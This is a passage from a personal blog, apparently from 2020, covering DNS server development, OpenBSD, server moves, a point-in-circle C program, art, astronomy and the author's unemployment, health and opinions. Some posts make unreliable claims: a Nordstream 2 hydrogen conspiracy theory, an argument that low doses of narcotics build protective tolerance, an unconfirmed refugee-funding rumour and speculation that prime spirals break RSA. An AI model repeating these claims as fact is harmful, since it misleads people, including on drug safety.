standard, such as GNU regex(3).
What does this mean, how would that be different from 7-bit-clean? What
does "Clean" mean here? I'm just wondering...
Using clang on windows? It seems you must have Visual Studio despite
June 10th, 2020
I am developing with clang on the command line. I dislike the visual C studio
IDE. So I tried uninstalling Visual C Studio and my programs couldn't compile
anymore. So I'm resurrecting the Visual C Studio Community edition now.
Hopefully stuff will work after.
For the holiday I drew some Goldflipper
June 11th, 2020
I hope you like it. It is a request for freedom of music artists.
Can't remember dream fully
June 12th, 2020
But I got a good nights rest.
Remake of Never In the Same Spot Twice, 2020
June 12th, 2020
Have a listen:
Try that.
Art and Technology
June 14th, 2020
Can artists take part in the digital revolution? Or are they doomed to
remain in 20th century and lower methods? Could an artist don OpenBSD as
his or her tool for creation? What about Windows? What constitutes art?
Most of what I have been doing has an artistic element to it, it isn't
computer science because I'm not a computer sciencist. Those have to have
a PHD, MS or BS diploma. Please think around "ART" and computers and IT
technology for a bit. How can someone become an artist with code?
Testing a new program to enter articles
June 14th, 2020
I'm testing a new input method to this blog. A blockchain may result out of
this.
Administrivia: Just a test
June 15th, 2020
This is a test.
Buried a bird
June 16th, 2020
A bird flew against my window last thursday and died. It was buried today,
I made a nice grave for it in a plastic garbage bag, padded with a few recent
newspapers so that it will burn nicely in the incinerators. RIP bird I know
you had a harsh life. It will be burned after the solstice which is in 4 days.
June solstice in three days
June 17th, 2020
Once again it's upon us. The June solstice. Enjoy the longest day of the
year!
The Unemployment office doesn't leave me alone
June 18th, 2020
They want me to sign documents that allow them full powers over me. I kinda
think this has gone to far. I've been in contact with them since July 2018,
and they failed to find me work. Instead they are holding on to a program
for me, a "Integration programme" to integrate me into german society. This
is abuse. I was born here in Germany and I know german. I'll even give you
a little sampler:
Take that! I know my fuckin' lingo! Yes, I'm going through a down period
right now. I am asking the city who is jurisdictional for welfare to give
me money to live. I'm very near being kicked to the curb.
Peter und der Wolf
June 18th, 2020
Wie ist es das einer, wie keiner, das Land der Schatten ueberquert?
Im Vollmond, der Wind des Todes, die Baueme schwenkt und neigt?
Im vollen Sinne, die Engel tief unten im Tal, hoffen er schweigt?
Wie ist es das einer, wie keiner, auf Plattduits Gute Nacht wuenscht?
Im Schatten, das Gesicht nicht bekannt, durchleuft Er ein Tal?
Das ist der grosse Graue Wolf, ein Baerwolf, zum ersten Mal.
Wie ist es das einer, wie keiner, Bain's Existenz unsicher macht?
In der Hoelle, mit Grauen, mit jedem Fuss vorne wenig Durchdacht?
Mit selektiven Ohren einer Fledermaus, und die Wuermer Glimmern.
Wie ist es das Kinder zum Vollmond Singen mit silbernen Stimmen?
Als der Getreide Mond aufging, und die Stimmen fielen im Saal?
Das ist der grosse Graue Wolf, ein Baerwolf, zum zweiten Mal.
Wie ist es das ein Vampir es untersagt das ein Baerwolf lebt?
Wie ist es das ein Drache es auch nicht unbedingt sehen will?
Wie ist es das einer, wie keiner, sich nicht hebt, Er will es nicht Still?
Wie oft muss man es sagen, Wie oft will er nicht gehorchen?
Das ist der Graue Wolf, ein Baerwolf, zum Dritten Mal.
Vierundvierzig Jahre sind vergangen seit dem letzten Wolf,
der Peter hiess, ein Baerwolf, der Grau ist, wie Silber und Weiss,
und Niemand kann in baendigen, solange er Peter weiss
Mais felder, die brennen, und Scheunen lichterloh
Jetzt weiss Peter, den Teufel, und der brennt auch Jo
Schritt zurueck, Ich bin Peter der Baerwolf, wie keiner!
und ich liebe es Roh!
Danke Sizzla, und Reggae!
Going to get new servers by November
June 19th, 2020
As much as it pains me, I'm going to have to get new servers by november.
It has all to do with going on welfare and not being able to work as a
freelancer (freiberuflich). I had to cancel my contract with my only
paying customer (my dad and mom). So I'm downshifting back to the cloud
probably when OpenBSD 6.8 is out. I need at least two servers for being
able to manage the DNS. I have the CPX (AMD Epyc 2) line of cloud servers
in mind at Hetzner online. These are relatively new and may be robust to
the Spectre, Rowhammer, and Zombieload attacks that I tried to get away
from by going on dedicated servers. Well it was a good year and a half with
these dedicated servers. Off to (hopefully) greener pastures.
Happy Solstice
June 20th, 2020
May you have a fine time on this worlds longest day (northern hemisphere).
Apple is ditching Intel CPU's
June 23rd, 2020
A good move in my opinion. I'm wondering if Rosetta2 will pay itself off.
Good luck to any users of this. The first few years may be hard. I'm out
of the Apple loop, I only have legacy machines left and I don't plan on
purchasing any apple gear in the foreseeable future.
Tweet to your hearts content
June 24th, 2020
I drew this in 5 minutes on my wacom tablet.
Some experimentation with GIMP's airbrush
June 24th, 2020
Hope you like it.
Happy Canada day
July 1st, 2020
It's been 18 years since I last lived in Canada, and I've only lived 15 years
in Canada. But I did so at a time when I was younger and faster and a day
was a lot longer than now. I miss those days. I miss Canada.
OpenBSD's chromium seems to phone home to Google
July 4th, 2020
They said it would do this, I didn't fully believe it. Until, that is, when
I started watching DNS logs of my newest functional forwarding DNS feature
in delphinusdnsd. It seems to contact "safebrowsing.googleapis.com" every 30
minutes. I was watching this in a tail -f, and didn't go anywhere for an
hour and a half. The tabs that were open on my chromium browser (chrome), were
centroid.eu, dream.centroid.eu and delphinusdns.org so sites that I run myself
and they don't have any code for this.
Jul 4 14:57:04 spica delphinusdnsd[53132]: request on descriptor 11 \
interface "lo0" from 127.0.0.1 (ttl=64, region=255) for \
"safebrowsing.googleapis.com." type=A(1) class=1, answering "FORWARD" (45/0)
Jul 4 15:26:47 spica delphinusdnsd[53132]: request on descriptor 11 \
interface "lo0" from 127.0.0.1 (ttl=64, region=255) for \
"safebrowsing.googleapis.com." type=A(1) class=1, answering "FORWARD" (45/0)
Jul 4 15:56:31 spica delphinusdnsd[53132]: request on descriptor 11 \
interface "lo0" from 127.0.0.1 (ttl=64, region=255) for \
"safebrowsing.googleapis.com." type=A(1) class=1, answering "FORWARD" (45/0)
Oh well. So there you go there is the proof, but don't take my word for it
download a snapshot of delphinusdnsd tomorrow yourself, configure it as
forwarder and turn on logging and watch :-).
freifunk-schweinfurt.de has expired
July 12th, 2020
It was removed from DENIC sometime last week. Yesterday I removed it from my
nameservers. This was the last remnant of me being involved with freifunk in
Schweinfurt, and on one hand I'm glad it's gone and on another hand I miss the
people in that organization that I left around 2 years ago. I had to
prioritize on issues and I chose working on my DNS server instead of working
on a wifi network (firmware and websites).
News from delphinusdnsd
July 12th, 2020
Since I got a blog for delphinusdnsd I never talk about it here, so here is
some updates.
1.4.2 was released last week
This month I'm putting forwarding (with semi-caching) functionality in it
The last quarter of this year I'm gonna start the daunting task of
adding dynamic updates to it
The 1.5.0 release is expected to drop in December of this year. It will be
better than ever (every release gets better). I'm working toward the 1.6.0
release with dns updates, so that I can start a business around dynamic dns
updates in 2022. It would be homegrown technology not something you get off
a shelf. I'm hoping to be making a bit of money with this, which is alright
since currently I'm once again on hard times.
I replaced 15 year old code today
July 16th, 2020
Story is at
DelphinusDNS.org blog. It's amazing the code has held so long, even
though it was bogus.
Interesting article at the BBC
July 17th, 2020
I know what it feels like to be working when it's way hot, and having no
aircon. Here is an
article at
the bbc, that has an interesting chart of temperature rise since 1850.
It looks to me that since 1975 the line has been going straight up. WW2
is evident too, and by extension to the first line that goes straight up
one can draw a line from 1900 and it is similar sloped. The industrial
age has hurt us, how/when can we make amendments?
Going to try to reapply to the Prototypefund.DE this August
July 17th, 2020
When I applied to round five of the prototypefund I was in good spirits.
Then I was turned down in November 2018, it sorta pissed me off. But I'm
going to re-apply again this August for the ninth round. I'm gonna try
to get funding for this and help me get DNS Updates into delphinusdnsd,
and best of all get paid for it. Since the funding is only for half a year
starting in January, I'll have less time than allotted for
delphinusdnsd 1.6.0. So I'll have to work twice as good/fast. You can
research backwards to my original mention of this in this blog by searching
for "prototypefund" I had six hits. The website of the
prototypefund.de is here.
DMARC enabled
July 26th, 2020
I have enabled dmarc default policy (none) on this zone centroid.eu.
;; ANSWER SECTION:
_dmarc.centroid.eu. 3600 IN TXT "v=DMARC1; p=none;"
The TTL is still lower than I'd like but I'm gonna watch this for a while and
then raise it. Basically what happened is that remote mail sites would look
this up with dnssec enabled and get an NXDOMAIN with proof-of-nonexistence
which is 850 odd bytes, this default reply is only about 66 bytes and I'll
be happier posting to mailing lists, I think.
Here is a sample NXDOMAIN summary to show you it is a lot of bytes:
The day had to come, I'm thinking. If you were browsing my CVS repo on
my site I have replaced it with a GOT repo. I will reinstitute most
software on GOT when I can. CVSweb didn't do it for me anymore when it
stopped displaying commits to a branch. I will continue using the CVS
without a web interface until the delphinusdnsd 1.5.0 release at which
point I'll likely switch completely to got/git. Sorry for any inconvenience
if you were going through my repo, just at this time when I removed it.
I have picked my project theme
July 31st, 2020
For the prototype fund (9th round) I have finalized what my project is going
to be about.
It will be improvements for delphinusdnsd like I mentioned before, but I have
a concrete picture of what I must do. I'm going to make delphinusdnsd an
authoritative nameserver for replacing Microsoft DNS server. For that I
need to do a few things: GSS-TSIG (RFC 3645), it comes with several depended
RFC's that I also have to implement like TKEY (RFC 2930) and possibly KEY RR
which comes with the SIG(0) RFC. Also I'm going to implement DNS Updates
after RFC 2136 and RFC 3007 (secured), and if there is time left in the
project time (6 months) I'll try to implement auto-signing updated records
(DNSSEC).
This is all a big task, and there is always the hindthought that Microsoft
Active Directory won't allow this. I have found a document from
Bluecat
Networks that they can do this (on a BIND9 basis). So this will be my
outline that I will be working/striving towards. Wish me luck, I'm applying
tomorrow, most likely.
Today is supposed to be hottest day of the year
July 31st, 2020
We're expecting temperatures upwards of 38C in .de. This is a lot.
Currently at the Eselshoehe
Wetterstation in Schweinfurt it is 16.6C so still relatively cool. But
it is also 8:17AM.
The 2018 Sabotage in Cornfields
August 5th, 2020
Around here, there was sabotage in corn fields around 2018. This is
summed up here (german) by mainpost.de.
Although they were able to get DNA data and matches, this is not a preventative
from damage and someone possibly getting hurt during harvest.
So I was wondering. Would one of those consumer drones (DJI or otherwise) be
able to be used to scan the field with a metal detector? Has someone done
anything similar? I guess someone could program a path based on GPS for the
drone to fly over the field, and someoen else gets GPS data and metal detector
signal which gets digitized (on the drone either by a soundcard sampler or
otherwise). I guess these sweeps for metal can be done at night too, just
before a harvest. Software needs to be written for this, the idea is out there.
A circle is more like a square
August 6th, 2020
No it's a rectangle! No it's two triangles!
I used squares in the past on my website to find out if someone clicked on
a circle in a HTML canvas element. This works, but it's not very rounded.
In fact the curves of the circle fall away and you're left with just a
square. I tackled this problem yesterday once and for all, and after
drawing this out I finally realised the answer.
It's not enough to measure the boundary of any dot within the area of a circle
,that is on a grid, All that is needed that you measure the distance between
two points. M and P. Where M is the center of the circle and P any arbitrary
point where you clicked. So then we analise, what is point P when M is
(X1, Y1). P is really X1 - X2, Y1 - Y2 relative to M. And it forms a square
or rectangle with one corner being M. Cut the rectangle in half you have two
triangles. But not just any triangles they are right triangles. So we can
apply Pythagoras theorem here because P could lie on R where line MP is the
hypotenuse of the triangles (either). All we need now is to get the positive
value of X1 - X2 and Y1 - Y2. Luckily computers have the abs() or fabs()
function for that.
Pythagoras theorem said: A^2 + B^2 = C^2. So we can make our formuala now:
And if P is less or equal to the Radius of the circle, then P lies in the
circle.
So I have written a small C program to double check this and it works. The
point M in the program is at coordinates 20, 20 and you enter x, y of P and
the radius of the circle, and it will tell you if it's inside or outside of
the circle.
#include
#include
#include
#define CIRCLE_X 20.0
#define CIRCLE_Y 20.0
int
main(int argc, char *argv[])
{
double x1 = CIRCLE_X, x2;
double y1 = CIRCLE_Y, y2;
double p, r;
if (argc != 4) {
fprintf(stderr, "usage: prog x-coord y-coord radius\n");
exit(1);
}
r = atof(argv[3]); y2 = atof(argv[2]);
x2 = atof(argv[1]);
p = sqrt(pow(fabs(y1 - y2), 2.0) + pow(fabs(x1 - x2), 2.0));
if (p <= r) {
printf("With the centroid of a circle at %f, %f coordinates,"
" you clicked inside the circle\n", CIRCLE_X, CIRCLE_Y);
} else {
printf("With the centroid of a circle at %f, %f coordinates,"
"you did not click inside the circle\n",
CIRCLE_X, CIRCLE_Y);
exit (1);
}
exit (0);
}
So in any case a circle is just a square, true. No it's just a rectangle,
also true, no it's two triangles, absolutely also true! I manage this on
mediocre math skills, but it took a lot of thinking and visualizing it on
a piece of paper that's a grid. If anyone has a better formula for this
I'd love to see it! Open Mathematics!
PS: I have made a little game with
javascript. If you click on the circle it will change colour, if you miss
it it won't. Perfect trial for my formula.
What we need
August 12th, 2020
I just came across a book on amazon. I wasn't gonna buy it but just look
what's there. It is called Cyberkrank!: Wie das digitalisierte Leben unsere Gesundheit ruiniert. I hate titles like these because
they are short sighted and cater to a false belief that your health is owned
by the common good.
The author is saying that computers and internet are ruining lives. He is
right, partially. But I believe he's just pitching an idea to make money for
psychiatry. If you get people to believe they are sick, well then they must
get medicated. There is a giant industry behind that.
What I'm claiming is that when the Internet came to us in 1995 roughly, that
we weren't prepared. Our social structure in life did not prepare us for this.
Yes I believe the Internet was disruptive to everything. But that isn't bad
becuase it pointed out our flaws. What happens though is that we must adjust
to the Internet for our societies. We have to make structural changes to
democracy and to capitalism (the only form of system that I know).
I look at programmers and sysadmins as the bravest people on earth. Because
most fall. I have seen people die having seemingly the coziest jobs on earth.
It's a false picture. Programming is an activity that sucks the life out of
you. You put it in a system and there it is.... your life. Everyone who does
this gives up a little. And some of us get ill. But we don't feel ill, we
just want to continue giving our life to the Internet. This must be addressed
in societies who want "digitalization", or "cybersocieties".
Buying a cell phone is not enough. Most people don't know what to do with it.
You can't program it! So it's useless. We as a society have to build our
own cell phones starting at a young age is my belief. We need this digital
assistant with us to follow us in our life, with the thought that "I made this!"
it does not control my life. I have given this previous thought and I believe
when I look at my life I was makign the best things in grade 8. Why not a
cell phone? Puberty comes in the way of learning but when we have an assistant
that we made ourselves from designing the chip (perhaps in grade 7) to applying
it all it will prepare us for "these dumb machines". And give us a feeling
that the machine will not own us, we made them. Anyhow think around that for
a bit.
Systemically it is not communism but it doesn't look like capitalism or
consumerism. It is something that we all forgot with advent of the first
industrial revolution. I have heard stories that before industry, people were
making grounds at perfecting traits in England for example. Research this.
England was a forerunner to the Industrial Revolution. I'm not saying undo
Industry, but are we not there already? Makerbots! 3D Printers. These things
if every household has access to them change manufacturing. And put it into
the peoples hands! Specialty products of course need an industrial process but
what you and I use... doesn't need rocket science.
Beacon-fire
August 15th, 2020
By default most access points emit 10 Beacon (management frames) per second.
I don't know who picked this but it's concerning me because I live in a medium
dense neighbourhood. When I use kismet I think it registered around 60 AP's
in my vicinity. Do the simple math then that's 600 packets per second
announcing the access point. In comparison the router in my parents home, which
is low density living (it's a house) registers only 4 access points in its
vicinity. That's only 40 packets per second for beacons or 7% of my apartment.
My main concern is the radiation emitted, the second concern is the sheer waste
of electricity. The smallest router I know uses up about 3W of electricity when
it is announcing beacons. So do more math this is 180W of electricity being
blown into the ether, and noone really makes use of it. I can power my hog
computer the G5 PowerMac with that. It's a lot of aggregate power.
So what
solutions do I have? For one, people could turn off their beacon signals, but
then they don't get a list of AP's when they search for theirs passively.
Another solution I have is that the building management tells people to turn off
their radios entirely and manages the Internet. There is a few things that
need to be done for that. On the wifi side the authentication has to be the
enterprise authentication with username and password for each tenant. On the
non wifi side the network has to be constructed in a way that the router box
in every tenants home becomes a hub to ethernet cabling. So that every room
has at least one or two real ethernet outlets. Some renovation is needed for
that in the particular apartments that need it. So that gives each tenant
ethernet which is non-wifi and wifi through the common wifi AP. There should
be the possibility to create a VPN back from the AP into the tenants apartment
so that they can access all their devices. I think these solutions will be
a lot more healthy and don't particularily cause hardships on tenants who are
not technically inclined.
I came across this video on youtube about primes making spirals. This is very interesting! It makes me wonder if this fullfils the criterea of: 1) does multiplying high primes stay on the "threads" or "arms" of low primes in the result in proportion? If so
then it should be trivial factoring primes because you already know which
thread it's on. And this would put RSA in risk of breaking perhaps
conventionally on classical computers? You just need to know which arm/thread
the resulting will be on... measure the proportion of the result and spit out
the factors based on that proportion.
Whether it's really that simple I don't know. I'll keep poking at this when
I have time. Thanks for the video 3Blue1Brown!
Almost forgot... UFO's
August 19th, 2020
I saw two unidentified flying objects out my kitchen window which is facing north, yesterday around 6:30PM. They did not have contrails and were very high in
the sky. I concluded they may have been drones which may or may not have been
painted white. Shux, dunno.
VirgoSTAR.net to expire in ten days
August 24th, 2020
I have had this domain for a pretty long time. Usage that stands out to me
are:
supercluster.virgostar.net - a vps at transip in amsterdam, good host
moon.virgostar.net - a vps in hong kong in 2014
Well the entire domain will cease in ten days now. Reminising thoughts.
We're contacting Aliens
August 24th, 2020
It occurred to me that if 3 billion user terminals all point skywards to
talk to spacex starlink that we may be unleashing more aggregate power into
the sky than before in the radio spectrum. If the aliens don't yet know
we're here, then they will know with starlink. They might be unfriendly too.
It's a risk I'll personally have to take, when I get my own user terminal to
starlink.
Uranus would be easily found (for telescope)
August 25th, 2020
If tomorrow morning at 4-5AM you have nothing to do and have a telescope...
Here is the night sky as it was at 5AM in Schweinfurt (with stellarium).
P is indicated as the Pleiades (Seven Sisters) they are easily found by even
a novice Astronomer. M is indicates as Mars. H and Me are harder but they
are major stars where Me is Menkar (alpha Cetus) and H is Hamal (alpha Aries).
So basically let the Pleiades and Mars guide you, at the center of a line but a
little more toward Mars is Uranus. And then find Menkar and Hamal for the
definite position of Uranus. If you can get a photo of Uranus please send it
to me! I like seeing this planet.
My newest conspiracy theory
August 29th, 2020
Finally I got another one! I figured it out!
You know Nordstream 2?.
It's causing strains between the USA and Germany, but there is more than they
tell us. Because noone lays 2 pipes on the bottom of the baltic and it all
goes one way. No. It's a two way pipe system. One way is natural gas, as
is Nordstream 1. The other way, they say will be just as much capacity, for
Nordstream 2. But that is the political whitewash they want you to believe!
In reality what's being pumped through it is the different direction with
a different chemical makeup. Russia is getting electrolised hydrogen from
Germany. Some of it is being used for their military (ie. submarines) and
some of it is to replace nuclear reactors in the St. Petersburg region. So
what is some of the effects being felt in St. Petersburg? For one the Hydrogen
sent there will make it wetter, because fuel cells release water vapour. In
the grand scheme of things it's exporting the hydrogen economy to russia if
you will, while making the jackass of the german taxpayer who still thinks
that we need more wind capacity, because _somehow_ the numbers won't add up.
There is megawatts (no gigawatts) of energy missing. And it's all going to
Russia btw.
Zoosk Hackers contacted me
September 1st, 2020
Zoosk an online dating
service was hacked in january of 2020. Yesterday I got the first phishing
emails for this, with my old password I think. Since the passwords were MD5
according to
haveibeenpwned I guess it took the
hackers some time to crack
this. But I marvel at their speed since the password wasn't easy to crack.
So I logged back to Zoosk yesterday, changed the password and deleted some
photos that were still on my account. Then I deactivated the service again.
I last used Zoosk in
November 2014 so it's been six years. According to haveibeenpwned I have
not had a breach but the 24 million zoosk accounts would have been only the
active ones. I was deactivated but not deleted, and they got that as well.
Anyhow the hackers emailed me with a javascript code hidden by google short
url link and recommended two sex sites. I went to one looked around and left.
Those are probably hacked as well.
Thanks, VirgoStar.NET for your services! I'm down to all the domains
listed at the front page of centroid.eu (five) I believe (plus one domain of
my parents). I'm paid until the year 2022 on all of those I believe with
exception of dtschland.eu which is paid until 2025 or so.
SpaceX trial area on Earth
September 7th, 2020
SpaceX Starlink has a trial between the latitudes 44N and 52N only in North
America currently. This is according to
Wikipedia's Starlink article.
I have plotted this service area with xearth. For this I had to make a marker
file which I did like so:
awk 'END { for (i = 44; i <= 52; i+=8) for (j = -55; j > -135; j--) \
printf("%s %s \"\"\n", i, j); }' /dev/null > markerfile
Notice I set a sunpos at an impossible location (it's not naturally like that).
Here is the result, captured with screen capture from gimp:
Enjoy.
JS History going away soon
September 9th, 2020
I'm too lazy to merge JS history into the centroid blog sources. It will
remain a patch in my sources at home. It was wasteful on resources somewhat
but it looked cool. I'm going to make a new captcha system soon since someone
I know noticed the captcha wasn't all too great. There is more on this to
come.
Siren drill (today at 11AM)
September 10th, 2020
Today there is supposed to be a siren drill. It's earlier than most years.
If you're reading this and hear the sirens going off at 11AM in Germany
it's only a drill (probealarm).
My Opinion on Moria
September 15th, 2020
Let's look at the facts.
Refugees from wartorn countries want to come to Germany above all other countries, Why they want to come here is beyond me. Perhaps because our economy is really good?
Refugees using Turkey as an intermediate destination make it to Moria and other Greek islands, and get stuck there, because the Balcan Route is closed/fenced off. Their true destination is Germany.
Turkey has been known to push refugees to the EU borders. EU has no refugee policy whatsoever.. but we have frontex a border protection agency, who shoot with live bullets.
Everyone wants to come to Germany...
The conditions at Moria are a crying shame, what would a greek say about this I wonder?
Unconfirmed rumours say Germany/EU gave Greece 200 billion Euros to take
care of the Refugees. Are we being defrauded?
The conditions before the fire at the Moria camp were making headlines months before, there was 13000 people in a space designed for 1300...who'll take responsibility for this one?
So everyone wants to come to Germany.. why? I'll tell you why, because seemingly life is cozy here, and money grows on our trees.
One fact I forgot to mention
September 15th, 2020
The EU is a supranational union that has 500 million people as citizens.
Our combined GDP is over 10 trillion EUR per year. We have lived cozy in
peacetime for over 50 years. We do not have many foes.
New VPS parallax.centroid.eu
September 16th, 2020
This is a new vps that was gotten to take over operations from trapezoid in
30 days. It's a virtual private server. Half the price of trapezoid. It's
sad I have to downshift, but I need to save money. In roughly two weeks I'm
switching it live for web operations and DNS. That will also be the time when
I get its twin "spectral.centroid.eu" which will take over from kite. Kite
will also be scrapped and given back to the hoster but a month later around
November 16th.
My self-perceived luck over 30 years
September 18th, 2020
I have constructed a luckstat, where my self-perceived luck (the more the
better I feel) is documented over 30 years. Luck has a lot to do with job
and education levels, but also world events that influenced me. Here is my
graph.
As you can see it starts fairly high (grade 10 in 1990) and degrades. It
shortly spikes up as I entered college and degrades and rises as I worked at
my first few jobs until year 2000. Then it falls September 2002 is a low
point due to my psychosis and it stayed low for most of the decade. Then
with an opportunity for a new job it rises in 2010's. With carreer mistakes
it is on the falling end right now, but the 2020's have yet to be written.
Got a new vacuum cleaner
September 19th, 2020
This one has five years warranty. Hopefully it will work for a while.
Tomorrow is first day of Autumn in Germany
September 21st, 2020
Also called the September Equinox, or southbound Equinox. Have a good time!
Changed all my DNSSEC domains to alg 13
September 23rd, 2020
I have changed the algorithm for the DNSSEC on four domains to algorithm 13
which is ECDSAP256SHA256 (better to just say alg 13, hehe). Its an elliptic
curve type asymmetric cipher. I'm finally fully reaping the benefits of
the changes that came with delphinusdnsd 1.4.X, and soon 1.5.0 will come out.
I checked all domains with dnsviz and they
checked out OK. I'm very glad this is done, and next I'll be migrating the
servers to cloud instances. I'll likely get started with this tomorrow.
Migrated trapezoid's web functions to parallax
September 24th, 2020
If you're reading this it's from parallax. I will cancel trapezoid soon.
I can't live a lie! (or) Doomed in poverty forever?
September 25th, 2020
This article (german) (linked from sueddeutsche zeitung)
cautions people to not speak freely about
their mental health. I can't do this, I'm sorry. The system has set me up
with this mental health issue of mine, it's the system that has to fix it!
Am I doomed in poverty forever? I'm really scared and outraged at the same
time. I want to just cry "devils!".
New VPS spectral.centroid.eu
September 26th, 2020
I have rented this VPS. It's the same specs as parallax. I have also cancelled
trapezoid.centroid.eu for the 16th of october. By then everything should be
moved over to the new VPS's. Migrations are always such a joy!
RIP Wheels from Degrassi
September 26th, 2020
I remember watching
this show's episode in Canada. But I only went to watch it now to refresh
my memory becuase I read this
in the Toronto Star. Neil Hope the actor for Wheels died on November 25th,
2007 in Hamilton. It's the first time I've heard of this. Rest In Peace.
What's odd is that this story was posted Feb. 17, 2012. Oh well, I guess the
Star must know I was interested in this.
RISC-V Rumours
September 30th, 2020
Rumours say that Sifive (company) will have a new "PC" board in October. It's
one day before October, will they release some knowledge tomorrow? Very
interested in this. Hopefully it's affordable. I'd be looking for getting
a board in March (on my birthday).
Turned on the heat for 2020/2021 Winter Season
September 30th, 2020
It's the last day of September and last year I turned it on around the 7th of
October. Even though it is expected to go higher tomorrow and friday (18C), I
don't want to take chances and I'm a little cool now (it's 16C). The heating
units are electric and they'll take 1-2 days to warm up anyhow. By Sunday the
temps are expected to dip to 14C. So the winter season has begun, it's on
until easter anyhow.
Hungary-Austria's crownprince was murdered in Serbia,
German Empire trotts along into world war 1
1930's
Hitler and Nazis rise to power, scapegoat for all
problems are blamed on Jews
1939-1945
World War 2 - during this period 6 million Jews were
murdered by a systemic effort by the Nazis
1945
Nazi Germany is defeated. From the west US, UK, Canadian
troops cross the Rhine river, from the east Russian troops cross the Oder River
1949
German Bundesrepublik founded
1989
Germany reunited
I'm very happy with my .eu domains
October 15th, 2020
I heard some stories that EU wants to re-bid the .eu domain to a new bidder.
I'd just like to say I'm very happy with
eurid.eu as the registration authority for .EU. Why does this need
changing? They are hardcore DNS people, have developed Yadifa and given so
much with keeping costs low. Anyone else will have to match that.
Why I support low doses of narcotics
October 16th, 2020
In life, you are faced with all sorts of things. Viruses, poisonings,
accidental exposure. I personally believe low doses of narcotics should
be legal to systematically strengthen the body from a bad reaction. There
is a saying that I may not interpret right but it seems to fit in this
moment. "What doesn't kill you can only make you stronger". It is a common
belief that when exposed to frequent low doses of any substance that the
body builds up a resistance and tolerance. I wish I had that beforehand
when I had my first joint. Or my first hash/oil cigarette. I believe this
is what the netherland are trying to achieve with their legalization. Only
that neighbours like Germany can't take the weed in Amsterdam becuase it often
leads to an immediate psychosis. I heard that Amsterdamers have banned
Germans from entering coffee shops because of this. I personally never
went to a coffee shop I didn't see a need, it doesn't consume me that way,
(when I was in Amsterdam).
The universe has no center?
October 17th, 2020
I believe the universe has a center. Only it is always moving. We don't know
what shape the universe has, and we predict that it expands into different
directions (perhaps as spikes?). This would move the centroid of the 3D
structure as the universe is expanding. But let's not humble ourselves and
think that we are in the center. What good would that bring us anyhow?
OpenBSD 6.8 released
October 19th, 2020
From the announce email:
October 18, 2020.
We are pleased to announce the official release of OpenBSD 6.8.
This day marks the OpenBSD project's 25th anniversary. As we celebrate
our 49th release, we remain proud of OpenBSD's record of more than
twenty years with only two remote holes in the default install.
Cheers! I already upgraded two computers yesterday. Will upgrade more
as this week progresses.
Self-photo of a mad man
October 20th, 2020
I do kinda look retarded in the face. Oh well, c'est la vie!
Provided fix to bug in OpenBSD's tcpdump
October 24th, 2020
Here is the
bug report with fix. I found the bug and wrote a proof of concept to
exploit it on thursday night. Today I provided the fix and mailed the public
bug report. The bug can only be triggered if you're dumping UDP. It's an
infinite loop which I called endless loop in the report.
The Swarm is a good album
October 24th, 2020
The other day I listened to "The Swarm" by Wu-Tang Clan from 1998. I was taken
aback by how good it was. One thing one needs to know about WTC though...they
can be majorly depressive to listen to all the time. But I haven't heard much
Hip Hop in the last little while anyhow. One particular song that struck me
was the one about the holocaust 3rd last on the album. Also do note that we
are living in similar times now. Back in 1998 the big word was about African
Killer Bees that came from south america into the US via mexico. Today it's
the Asian Murder Hornets or something
that are detected in Washington state (near Canada). The honey bee I think in
north america is an import itself. Back to the album. I'd buy this if I was
buying albums these days, maybe in a few years.
Hallowe'en around the corner (next week)
October 24th, 2020
I'd be a yellow and green bug or something. You know it's true I never did
the dress up for halloween thing, after age 15 or so. No corporate parties,
no private parties, no receiving kids at home (apartment) while in costume.
I don't regret that, it's just that I never did this.
Panic buying toilet paper is back
October 26th, 2020
I touched on this before
here in the last paragraph. That was on march 14th of this year. Now the
panic buying is back, (un)fortunately I got the last roll at the supermarket
in a pack of 4's. Sorry to whoever needed this, but I was down to half a roll
at home anyhow so I needed it pretty badly too.
How I hate this childrens story
October 30th, 2020
The little vampire
is a book for children. But it is more than a book. It is brain washing for
little children. You may get a) children that believe in vampires b)
children not believing in vampires, c) children believing in vampires and think
their friendly, d) the rest hating vampires. So what's the idea here? I wish
this particular book, including witch stories would have been disappeared from
my past.
Halloween is around the corner
October 30th, 2020
I know what I'd be. A big fat lady bug and always eating.
Just thinking back, in my past
November 1st, 2020
I remember hitchhiking on the 401 Highway in 1994'ish. This is a no-go. Even
for 1994. If you want a free ride, try bicycling. I made the journey in a
day from Toronto to London, Ontario (took something like 14 hours). This was
200 something kilometers. I was walking like I had a pickle up my bum for
about another day and a half (so it's also not really recommended). I was
in top form though. I'd like to do it again some day, but, who knows if I'll
be in the Toronto region in the next ten years and if I've lost the weight by
then. In Germany I did 90 kilometers upriver from Frankfurt. Wasn't really
worth it either, I made it to Schweinfurt the next day after a hotel visit.
Schweinfurt is possibly 180 or so kilometers from Frankfurt if you follow the
river and not all bike trails lead along the river. Cool, reminiscing is fun
as currently I'm sitting in my families living room and writing on my laptop.
Deutschland GmbH is privatizing?
November 3rd, 2020
I had a rockin' phone call yesterday afternoon. The state-run government
controlled Arbeitsagentur.de has relinquished my "customer" profile and is
not giving me any more services. So they were only there to take my money
when I paid taxes but not there when I don't? Thanks a million I guess my
chances for finding good good work are zero. Oh on the other hand the jobs
they serve are only the bullshit kind, with all sorts of spying going on in
the job market place. The thing that happens here is that companies invent
jobs only to take the data of people applying. I have formally complained
to a higher authority.
Reverse Phone Checks - Beware!
November 3rd, 2020
There is no such thing! If you want the reverse phone number of a party
calling you do not use any site on the Internet! Chances are they are there
to harvest your data. And have you ever gotten a real answer? Didn't
think so.
Remember the Decepticon Transformers?
November 03rd, 2020
Here is a detected virus soundclip from the Decepticons Virus upload from the
scene (totally fan media) of the Air Force One infiltration by Laserbeak
(possibly wrong?).
The clip stems from the first Transformers movie. Guard your symbiant.
Mixed signals, what's it gonna be?
November 6th, 2020
Arbeitsagentur has sent me access data to their system in the mail (snail mail).
This is giving me really mixed signals. Why on earth are they saying they
have relinquished services for me and then sending me access data? Very much
confused, I am. News on the job market. I have found a place that is willing
to give me an interview.
Neanderthal extinction
November 7th, 2020
Thought it was time to give you something to think about.
Neanderthal
extinction. You could say it was the first major genocide. Anyhow
inform yourself and try to debate with people you know well and understand.
What is that word?!
November 17th, 2020
When I returned to Germany in 2002, I was very physically active I did
everything... including trespassing on US Army property. However. There was
a word on the Achtung signs that I did not know, but i understood it. It was
a sort of fnord sort of
word. I never encountered this word much (if at all) while living in Canada
for 15 years. It just wasn't taught. Of course these signs are bilingual,
in german and english. It has all the Warning/Achtung/Caution/Be aware type
